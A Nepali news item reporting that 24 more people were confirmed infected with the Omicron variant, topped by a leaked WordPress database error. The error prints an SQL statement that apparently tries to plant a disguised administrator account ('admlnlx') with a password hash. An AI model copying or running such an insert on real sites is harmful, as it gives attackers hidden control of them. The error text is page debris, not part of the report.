WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bq/P9wqwjswb6yEKORBXM.BhyrWkbY1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:31:30', '', 'admlnlx', 'admlnlx')
काठमाडौं । नेपालमा स्वास्थ्य तथा जनसंख्या मन्त्रालयका अनुसार थप २४ जनामा ओमिक्रोन भेरियन्टको संक्रमण पुष्टि भएको छ । पछिल्लो पटक जिन सिक्वेन्सिङ गरिएको सबै २४ वटा नमुनामा ओमिक्रोन भेरियन्ट पुष्टि भएको हो ।
एस जिन नेगेटिभ गरिएकामध्ये २४ वटामा जिन सिक्वेन्सिङ गरिएको र ती सबैमा ओमिक्रोनको संक्रमण पुष्टि भएको प्रवक्ता डा संगीता मिश्राले जानकारी दिएकी छन् । पुस महिनामा संकलित कोरोना भाइरसका ११४६ पोजेटिभ नमुनाको स्क्रिनिङ गर्दा २५० वटामा एस जिन नेगेटिभ आएको थियो ।
ओमिक्रोन भेरियन्टका कारण बढ्न सक्ने संक्रमितको चापलाई मध्यनजर गर्दै सबै अस्पताललाई तयारी अवस्थामा रहन भनिएको उनले बताए ।
हेर्नुहोस् मन्त्रालयको विज्ञप्ति
